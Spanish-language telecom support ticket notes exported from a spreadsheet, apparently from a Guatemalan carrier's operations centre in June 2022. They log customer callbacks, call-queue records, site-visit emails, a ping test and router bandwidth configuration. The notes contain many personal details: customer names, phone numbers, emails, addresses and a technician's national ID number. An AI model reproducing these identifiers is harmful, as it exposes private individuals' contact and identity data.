    <t>SE LLAMO AL CLIENTE NORMA RAMIREZ, PERO ENVIA A BUZON.
3001604801
COLA:
NOMBRE: A: 0050376019497
NÚMERO: 0050376019497
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 0050376019497
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 14:20:12</t>
  </si>
  <si>
    <t>F4604041</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 23386801 EXT 32320 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: ENLACE ID 7800226 CAIDO AG214</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE FUENTES AL 23386801 EXT 32320 NO RESPONDE AL MOMENTO DE MARCAR EXT. SE CORTA LLAMADA || SE INTENTARA LUEGO **
-ID 3001697276 - 3001697471
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE FUENTES AL 23386801 EXT 32320 NO RESPONDE AL MOMENTO DE MARCAR EXT. SE CORTA LLAMADA || SE INTENTARA LUEGO **
-ID 3001711588
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA SOTO 3275-8536 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001540599</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE FUENTES AL 23386801 EXT 32320 NO RESPONDE AL MOMENTO DE MARCAR EXT. SE CORTA LLAMADA || SE INTENTARA LUEGO **
-ID 3001745845
**</t>
  </si>
  <si>
    <t>F4604045</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RONALD GUEVARA 77474746 - 75892700 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001640870 - 3001641031</t>
  </si>
  <si>
    <t>F4604053</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FABIAN CRUZ-3212-1904 CONFIRMA QUE EL PROBLEMA ES DE INTERNET Y NO TELEFONIA ### SE PASA CASO A N1 PARA SU SEGUIMIENTO Y SE AVISA VIA SKYPE PARA QUE LO RETOMEN
3001535726
COLA:
NOMBRE: A: 0050432121904
NÚMERO: 0050432121904
DURACIÓN: 0:01:05
ESTADO: CONECTADA
DETALLES: 0050432121904
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/06/2022 10:59:04</t>
  </si>
  <si>
    <t>F4604078</t>
  </si>
  <si>
    <t>CLIENTE CARLOS SOLICITA SE LE MARQUE EN 20 MINUTOS.
3001540165
COLA:
NOMBRE: A: 49328288
NÚMERO: 011 50249328288
DURACIÓN: 0:14:47
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50249328288
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 16/06/2022 11:25:33</t>
  </si>
  <si>
    <t>F4604099</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR PAYES 37593628 MENCIONA QUE HABIA SOLICITADO MONITOREO POR 24 HORAS POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 11:00 HRS
-ID 3001617050</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO GUZMAN 58271830  MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
SE VALIDA QUE CLIENTE SOLICITO MONITOREO PARA LAS 15 HRS
-ID 3001554335</t>
  </si>
  <si>
    <t>F4604103</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
ASUNTO: EVIDENCIA ENLACE OPERATIVO Y ESTABLE SD1135700 || 40300081 || COMPANIA DE PROCESAMIENTO DE MEDIOS DE PAGO DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4604120</t>
  </si>
  <si>
    <t>SE LLAMA A CARLOS PERO NO RESPONDE---</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE SE ENCUENTRA ALMORZANDO Y COMENTA QUE SE LLAME A LAS 13:30 HORAS YA QUE ESTARA EN SITIO, INDICA QUE INCONVENIENTE ES QUE VEN UN FIREWALL FUERA Y ESTE UNICAMENTE QUEDA ASI CUANDO SE TIENE INCONVENIENTE DE LATENCIA-</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS ALAS AL 79303587 INDICA QUE NO ESTA EN OFICINA QUE HOY DESCANSO PERO SOLICITA QUE SE LE ENVIE CORREO CON PRUEBAS QUE ESTA OPERATIVO Y QUE EL CUANDO PUEDA NOS ESTARA RESPONDIENDO**
-ID 3001725262
**</t>
  </si>
  <si>
    <t>F4604129</t>
  </si>
  <si>
    <t>*-* SE HABLA CON BYRON ALVARADO 41497875 (CLIENTE)  INFORMA QUE NO ESTABA ENTERADO DE QUE ESTE ERA EL SERVICIO QUE LE PRESENTA AFECTACION, EL AUN ESTABA ATENTO A LA COORDINACION DEL F4604130, INFORMA QUE HARA LAS COORDINACIONES CORRESPONDIENTES Y RESPONDERÁ AL CORREO PARA QUE SE MOVILICE PERSONAL TEC INMEDIATAMENTE -*
-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTEBYRON ALVARADO  AL 41497875 CLIENTE INDICA QUE SI SE PUEDEN PRESENTAR LOS TECNICOS QUE EL EN ESTE MOMENTO ESTARA GESTIONANDO LOS ACCESOS **
-ID 3001571155
**</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE QUE SE PUEDA CONFIRMAR AUTORIZADOS PARA LA VISITA EL DÍA 17 - 9H ***
DE: ANGEL DANIEL TORRES AJTUN
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 12:26
PARA: BYRON.ALVARADO@FIFCO.COM &lt;BYRON.ALVARADO@FIFCO.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: F4604129 -- INDUSTRIAS ALIMENTICIAS KERNS Y CIA S.C.A. -- 288900005T
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA GENERADO UNA VISITA TÉCNICA, POR LO QUE SE REQUIERE DE SU APOYO EN LA GESTIÓN Y AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL QUE SE DESCRIBE A CONTINUACIÓN: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SE LLAMA A CLIENTE BYRON ALVARADO 41497875 PARA BRINDAR RETROALIMENTACION
UBICACIÓN:KILOMETRO 6.5 CARRETERA AL ATLANTICO (DESPUES DE CAFE INCASA)
-ID 3001613090</t>
  </si>
  <si>
    <t>F4604130</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON ALVARADO  AL 41497875 POR EL TT F4604129 Y CLIENTE CONSULTA SOBRE ESTA FALLA E INDICA QUE LE URGE QUE SE LE PUEDA REVISAR EL CANAL DIGITAL DE CENTRO AMERICA || SE NOTIFICA A GESTOR**
-ID 3001571155
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 54768548 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001558109</t>
  </si>
  <si>
    <t>F4604133</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERENTE DE TIENDA AL 47567063 CONTESTA LA SEÑORITA RIVAI CONFIRMA SERVICIO ESTABLE SOLICITA QUE SE LE LLAME EN 1 HR YA QUE REALIZARA PRUEBAS**
-ID 3001576787
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 47567063 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001559014</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERENTE DE TIENDA AL 47567063 CONTESTA LA SEÑORITA RIVAI CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
-ID 3001599000
**</t>
  </si>
  <si>
    <t>F4604136</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 24199955 EXT.1666 CONTESTA EL SEÑOR ALEXIS E INDICA QUE EL ENVIO CORREO Y AHI ESPECIFICA EL MOTIVO POR EL CUAL ABRIO EL TICKET Y ES PARA LA REVISION EN UN HORARIO ESPECIFICO || SE NOTIFICA A GESTOR **
-ID  3001556618
**</t>
  </si>
  <si>
    <t>NO SE HA TENIDO APOYO DE PARTE DE GESTIÓN N1 A LO DICHO EN CRONOS ANTERIORES; SE ESCALA CON JUAN CARDONA/TEAM LEADER N1 INDICA QUE NOS APOYARÁ CON GESTOR ASIGNADO.</t>
  </si>
  <si>
    <t>SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE DE LO DICHO EN CORREO ANTERIOR, CLIENTE CONSULTA EL FEEDBACK.
ASUNTO: RE: REVISIÓN DE SERVICIO DE INTERNET ID 412500001 | 16/06/2022</t>
  </si>
  <si>
    <t>F4604137</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE SUCURSAL AL 40702352  CONTESTA LA SEÑORITA SONIA DE LEON CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001578655
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE SUCURSAL AL 40702352  NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001556095
**</t>
  </si>
  <si>
    <t>F4604139</t>
  </si>
  <si>
    <t>CLIENTE MARIO CARIAS 79889222 SOLICITA SE LE LLAME A LAS 10:30 HORAS PARA VALIDAR  EL FUNCIONAMIENTO, YA QUE ACABAN DE INGRESAR Y NO HA HECHO PRUEBAS. ID: 3001891900</t>
  </si>
  <si>
    <t>CLIENTE MARIO CARIAS 79889222 INDICA QUE HA PRESENTADO RUIDO EN SUS LLAMADAS ENTRANTES, NO APOYA A REALIZAR PRUEBAS CON EQUIPOS, SOLICITA VISITA TÉCNICA EN EL SITIO. ID: 3001580091</t>
  </si>
  <si>
    <t>CLIENTE MARIO CARIAS 79889222 REALIZÓ PRUEBAS Y VALIDA QUE EL SERVICIO YA NO PRESENTÓ INCONVENIENTES, AUTORIZA EL CIERRE DEL CASO. ID: 3001922278</t>
  </si>
  <si>
    <t>F4604141</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CIENTE SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESETARA EN EL SITIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 20 DE JUNIO DE 2022 13:37
PARA: FELIXMIRANDA@CHURCHOSJESUSCHRIST.ORG &lt;FELIXMIRANDA@CHURCHOSJESUSCHRIST.ORG&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 349900018T | CC_IJSUD_GT_RAMA_SAN_JERONIMO
BUENA TARDE ESTIMADO CLIENTE , UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EL DÍA DE MAÑANA 21/06/2022  A LAS  10:00 AM.
DIRECCIÓN:  INTERNET.- 000-000 BARRIO ARRIBA SALAMA SAN JERONIMO
ADJUNTAMOS LOS DATOS DEL TÉCNICO QUE APOYARA EN EL SITIO
 RICO LOPEZ  WILDER ARNOLDO   IBM 718081       DPI 2680948611601 58264993
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4604145</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  CARLOS ILLESCAS 58259161   PARA REALIZAR PRUEBAS, PERO SIGUE SIN RESPONDE, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A JASON URIZAR/CLIENTE PARA PRUEBAS, SE PIDE APOYO A MÓNICA CASTILLO/GESTOR AE; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE
F4604145 / HOSPITAL NACIONAL DE MAZATENANGO / 1 AVENIDA 3 CALLE ZONA 1 MAZATENANGO / GDN 79326555
¿
MICROSOFT OUTLOOK
VIE 17/06/2022 8:49
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: RAULE.ALVAREZ@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
MONICA YIREH CASTILLO POON
BUENOS DÍAS ESTIMADO,
REFERENTE AL SEGUIMIENTO DEL E1 79326555 A NOMBRE DE HOSPITAL NACIONAL DE MAZATENANGO LE COMENTAMOS QUE ACTUALMENTE EL SERVICIO SE ENCUENTRA CAÍDO, REALIZAMOS PRUEBAS Y OBSERVAMOS ALARMA DE UNA POSIBLE DESCONEXIÓN EN LA ÚLTIMA MILLA.
SOLICITAMOS DE SU AMABLE APOYO CON REALIZAR PRUEBAS CON LOS EQUIPOS ASMI QUE SE ENCUENTRA EN LAS INSTALACIONES E INDICARNOS EL ESTADO DE LAS LUCES. EN DADO CASO CONFIRMEMOS QUE EL EQUIPO ESTA ALARMADO, SE PROCEDERÁ CON COORDINAR PERSONAL TÉCNICO PARA LA REVISIÓN DE LOS MISMOS.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS,</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  CARLOS ILLESCAS 58259161 DESPUES DE DOS INTENTOS NO SE TIENE RESPUESTA, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE JASON COMENTA QUE ESTA ENFRENTE DEL EQUIPO, INDICA QUE TIENE UN EQUIPO ASMI 52L EL CUAL INDICA QUE SOLO PWR - VERDE DE LO CONTRARIO SYNC / E1 SYNC / ALM - ESTAN APAGADAS INDICA QUE YA REINICIO EL EQUIPO PERO EL QUE EL SERVICIO NO RESTABLECE.
SE LE INDICA AL CLIENTE QUE SE ENVIARA PERSONAL TECNICO SE ESTARA ENVIANDO PARA RELAIZAR PRUEBAS CON LOS EQUIPOS INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO, SOLO QUE SE LE CONTACTE CUANDO ESTEN CERCA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2 VECES ##ENVIA A BUZON ##  CARLOS ILLESCAS 58259161##CLIENTE NO CONTESTA ENVIA ABUZON ##</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREOS NO SE TIENE INFORMACION DE PARTE DEL CLIENTE
SE CONTACTA CON CLIENTE  CARLOS ILLESCAS 58259161 PARA REALIZAR PRUEBAS PERO CLIENTE NO NOS CONTESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4604154</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROMAIN RIVERA 96667507 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001698502 - 3001698810</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN BUESO 33935956 PERO NO RESPONDE
-ID 3001699433</t>
  </si>
  <si>
    <t>F4604156</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE LIC. RONY PEREZ PERO NO CONTESTA.
3001608764
COLA:
NOMBRE: A: 0050378610942
NÚMERO: 0050378610942
DURACIÓN: 0:01:57
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378610942
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 14:35:32</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LIC. RONI PÉREZ AL 0050378610942 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001600512
**</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE LIC RONY PEREZ, PERO NO CONTESTA.
3001599325, 3001599467.
SE LLAMARA ENSEGUIDA.
COLA:
NOMBRE: A: 0050378610942
NÚMERO: 0050378610942
DURACIÓN: 0:00:19
ESTADO: MARCANDO
DETALLES: 0050378610942
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 14:01:40</t>
  </si>
  <si>
    <t>F4604161</t>
  </si>
  <si>
    <t>CLINETE OSCAR ESTRADA COMENTA COMENTA QUE ESTARA REALIZANDO PRUEBAS Y QUE SE LE PUEDA LLAMAR EL DIA DE MAÑANA A LAS 12:00 PM,</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OSCAR ESTRADA AL 47190166 INDICA QUE AUN ESTA REALIZANDO PRUEBAS QUE VE MUY LENTO EL SERVICIO SE LE SOLICITA QUE ENVIE LAS CAPTURAS DE SUS PRUEBAS INDICA QUE LAS ESTARA ENVIANDO POR CORREO || SE NOTIFICA A GESTOR**
-ID 3001807631
**
**</t>
  </si>
  <si>
    <t>SE ENVIA PRUEBAS POR CORREO SOLICITADOS POR EL CLIENTE, CLIENTE SOLICITA LLAMAR MAÑANA A LAS 12:00 PM DEL MEDIO DIA PARA VALIDAR EL COMPORTAMIENTO DEL SERVICIO
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 20:14
PARA: OSCARESTRADA90@HOTMAIL.COM &lt;OSCARESTRADA90@HOTMAIL.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: LENTITUD || ID: 488800005T || CLIENTE: INVERSIONES LIBERTY S.A. || UBICACIÓN INTERNET.- 2 AV. 16-44 ZONA 1
BUENA TARDE
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO, ADJUNTO LAS PRUEBAS Y EL INFORME DE LO QUE SE REALIZO EN LAS INTALACIONES
CAMBIO DE PATCHORD ELÉCTRICO  DE EXT1 HACIA ROUTER
LIMPIEZA DE FO Y SFP
PRUEBAS QUE SE REALIZARON:
SE REALIZO CAMBIO DE INTERFAZ DE LAN, GIGABITETHERNET0/1/2 EL CUAL SE CAMBIAN DE NEGOCIACIONES A FULL-DUPLEX, 100MB/S
SE RECONFIGURA NUEVAMENTE EL ANCHO DE BANDA CONTRATADO. SE VALIDA SIN PERDIDAS A NIVEL WAN , SE ADJUNTA PRUEBAS CON EL TRAFICO SE VALIDO QUE LLEGA 19M HASTA QUE SE DETIENE PROCESO POR EL TIEMPO EN SITIO.
&lt;GNCYGTAJN2D1B04B03EIM12&gt;PING  -C 1500 -S 1500 -M 55 -B -VPN INTERNET_GT_METRO 10.78.221.4
  PING 10.78.221.4: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.78.221.4 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/10 MS
CLASS-MAP MATCH-ALL SERVICIOS_30MB
   MATCH ANY
!
  POLICY-MAP SERVICIOS_30MB
    CLASS SERVICIOS_30MB
POLICE CIR  30720000 BC 5760000 BE 11520000
       CONFORM-ACTION TRANSMIT
       EXCEED-ACTION DROP
       VIOLATE-ACTION DROP
!
INTERFACE VLAN 1
SERVICE-POLICY INPUT SERVICIOS_30MB
SERVICE-POLICY OUTPUT SERVICIOS_30MB
QUEDAMOS ATENTOS A SUS COMETARIOS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4604166</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE PABLO ESCAMILLA  ENVIA A BUZON. SE INTENTARÁ CONTACTAR EN UNOS MINUTOS.
3001629119
COLA:
NOMBRE: A: 0050495930042
NÚMERO: 0050495930042
DURACIÓN: 0:00:08
ESTADO: MARCANDO
DETALLES: 0050495930042
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 16/06/2022 15:38:19</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE PABLO ESCAMILLA 95930042 INDICA QUE EN SU PBX YA OBSERVA LA INTERFAZ ACTIVA Y VA A REALIZAR PRUEBAS, SOLICITA LLAMADA EN 30 MINUTOS
3001615870
COLA:
NOMBRE: A: 0050495930042
NÚMERO: 0050495930042
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DURACIÓN: 0:02:33
DETALLES: 0050495930042
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 16/06/2022 15:00:38</t>
  </si>
  <si>
    <t>F4604174</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. YURI PLEITEZ 9561-4721 ACTUALMENTE EN LLAMADA  ID: 3001606583</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. YURI PLEITEZ 9561-4721, INFORMA SE ENCUENTRA EN SU ALMUERZO, SOLICITA LLAMAR A LAS  1:30 PM,</t>
  </si>
  <si>
    <t>F4604195</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGARDO TURCIOS  97031175 SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001564326</t>
  </si>
  <si>
    <t>F4604214</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRITA. YADIRA 31860427 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001847988</t>
  </si>
  <si>
    <t>F4604218</t>
  </si>
  <si>
    <t>CLIENTE JUAN CARLOS 52055660 COMENTA QUE LUEGO DE LAS LLUVIAS PERCIBE RUIDO EN SUS LLAMADAS, SE BORRA EL CONTADOR DE ERRORES DEL LGT Y SE PERCIBE INCREMENTO, SE COORDINARÁ WO PARA LA REVISION. ID: 3001584363
DISPPCMAC:LTG=2-49,PDCLNK=2;
PCM ALARM COUNTERS             LTG =   2-49  PDCLNK =  2    MASKNO:02212
TIME COUNTER   12-50MS   50-100MS   100-2000MS   &gt;2000MS
-------------+---------+----------+------------+--------
AIS                 20          0            0         0
SYN                 30          0            0         0
SSYN                 0          0            0         0
D-BIT                3          0            0         0
SD-BIT               0          0            0         0
SN-BIT               0          0            0         0
INC LOSS             0          0            0         0
AIS MULT             0          0            0         0
                                                            MASKNO:02213
ERROR COUNTER       &lt;10    10-32    33-36      &gt;36
----------------+--------+--------+--------+------
ERCO                  3        2        0        7
CODE VIOLATION  SECONDS  MINUTES
---------------+--------+-------
HDB3 -5               0        0
HDB3 -3               0        0
CALLP          BLOCKING  RELEASE
--------------+---------+-------
CAPCTL                2        1
COUNTER            COUNTER VALUE
-----------------+--------------
SLIP                           2
END JOB 8110</t>
  </si>
  <si>
    <t>F4604219</t>
  </si>
  <si>
    <t>-* SE HABLA CON CARLOS CONTRERAS (CLIENTE) INFORMA QUE EL ES EL IT PERO ESTA EN LA CAPITAL, SE LE INFORMA LO INDICADO POR GESTOR, COMENTA QUE VERÁ LA FORMA DE RELIZAR LAS CONEXINES Y CONFIGURACIONES CORRESPONDIENTES, NOS ESTARÁ CONTACTANDO SI REQUIERE ALGUN APOYO ADICIONAL -*
-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SHERLI BARREA 54258062 PARA BRINDAR RETROALIMENTACION
-ID 3001624371</t>
  </si>
  <si>
    <t>F4604245</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLINTE LESTER, INIDICA QUE ESTE ENLACE TIENE VARIOS DIAS DE CAIDO Y QUE SE TIENE ACCESO POR EL ID 38300649T, POR ELLO SE DESCARTA INCONVENIENTE CON ENERGIA, CONFIRMA LOS SIGUIENTES DATOS PARA VISITA:
PERMISOS: SI,  COORDINAR ENVIANDO DATOS DE LOS TECNICOS AL CORREO &lt;LESTER.KROLIK@SOMOSCMI.COM&gt; LESTER IVAN KROLIK MORALES | 30389449
HORARIO DE ATENCION: 9:00 A 22:00 HORAS
DIRECCION: 193, BLVD LOS PROCERES 18 C 6-35 Z-10
CONTACTO EN SITIO:LESTER IVAN KROLIK | 30389449</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30389449 LESTER IVAN KROLIK MORALES QUIEN VALIDA EL SERICIO DE DATOS,
3001664939
COLA:
NOMBRE: A: 30389449
NÚMERO: 011 50230389449
DURACIÓN: 0:03:24
ESTADO: CONECTADA
DETALLES: +50230389449
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 16/06/2022 17:53:58</t>
  </si>
  <si>
    <t>SE  TIENE A CLIENTE LESTER IVAN KROLIK MORALES EN LINEA
3001589159
COLA:
NOMBRE: A: 30389449
NÚMERO: 011 50230389449
DURACIÓN: 0:02:34
ESTADO: CONECTADA
DETALLES: +50230389449
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 16/06/2022 13:30:22</t>
  </si>
  <si>
    <t>F4604254</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOCELYN ALVAREZ 22407528 INFORMA QUE LOS EQUIPOS ESTAN ENCENDIDOS, YA APLICARON REINICIO PERO ENLACE NO LEVANTA. SE PROCEDE APOYO DE CAMPO PARA LA VISITA TECNICA.</t>
  </si>
  <si>
    <t>GESTION DE ACCESO F4604254 | IP2105130SV | DE C.V. BANCO DE LOS TRABAJADORES DE SAN MIGUEL S.C. DE R.L | USULUTANKM 117CONTG.IGLESIA SAN FCO ASIS
